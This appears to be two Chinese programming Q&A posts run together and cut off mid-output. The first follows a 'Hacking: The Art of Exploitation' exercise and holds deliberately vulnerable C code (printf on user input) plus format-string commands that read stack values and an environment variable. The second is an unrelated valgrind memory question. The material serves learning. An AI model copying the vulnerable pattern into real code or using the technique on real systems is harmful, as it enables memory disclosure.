我正在阅读"黑客 - 剥削艺术"一书.
这是我用于利用格式字符串的代码的简化版本.
/* fmt_vuln.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main (int argc, char *argv[]){
char text [1024];
if (argc < 2){
printf ("Usage: %s <text to print>\n", argv[0]);
exit (0);
}
strcpy (text, argv[1]);
printf ("The wrong way to print user-controlled input:\n");
printf (text);
printf ("\n");
return 0;
}
我运行这个命令:
./fmt_vuln AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
我有:
The wrong way to print user-controlled input:
AAAA59055000.58e347a0.58b68620.ffffffff.00000000.fba56ac8.58a9fc58.41414141
所以,我看到第8个格式参数是从格式字符串的开头读取的.
然后,当我运行命令时:
./getenv PATH ./fmt_vuln
我得到了地址:
0x7ffe2a673d84
所以我试着运行:(为了打印PATH变量)
./fmt_vuln $(printf "\x84\x3d\x67\x2a\xfe\x7f")%08x.%08x.%08x.%08x.%08x.%08x.%08x.%s
我有:
The wrong …我得到以下代码:
/* main.c */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main (){
int i;
char *msg = "This is a simple and small message";
int len = strlen (msg);
char *new_msg = (char *) malloc (len);
for (i = 0; i < len; i++)
new_msg[i] = 'A';
printf ("%s\n", new_msg);
free (new_msg);
return 0;
}
我编译它然后使用valgrind使用此命令运行它:
valgrind --leak-check=full --show-reachable=yes ./main
我得到了这个输出:
==8286== Memcheck, a memory error detector
==8286== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. …